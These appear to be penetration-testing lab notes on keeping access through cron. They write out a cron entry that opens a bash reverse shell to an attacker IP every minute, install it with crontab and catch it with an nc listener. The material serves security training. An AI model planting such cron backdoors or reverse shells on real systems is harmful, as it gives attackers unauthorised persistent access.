Cron Jobs

ip -br -c a
	192.175.36.2/24

ssh student@192.175.36.3

#Cron Jobs

ls -al
    drwxr-xr-x 1 student student 4096 Apr 29 14:04 .
    drwxr-xr-x 1 root    root    4096 Apr 26  2019 ..
    -rw------- 1 student student   18 Apr 29 14:04 .bash_history
    drwx------ 2 student student 4096 Apr 29 14:04 .cache
    -rw-r--r-- 1 student student   91 Apr 26  2019 wait

cat wait
    Delete this file to trigger connection reset.
    Delete it only after planting the backdoor.

cat /etc/cron*

Persistence

• Create a new Cron job as the student user

  • The command inside the cron job will be executed with the student's permissions'

echo "* * * * * /bin/bash -c 'bash -i >& /dev/tcp/192.175.36.2/1234 0>&1'" > cron

crontab -i cron
crontab -l

• Log back into the target system and trigger the password and connection reset

ssh student@192.175.36.3
rm wait
# Old student's password do not work anymore

• Setup a nc listener and wait for the bash reverse shell from the cron job that runs every minute

nc -nvlp 1234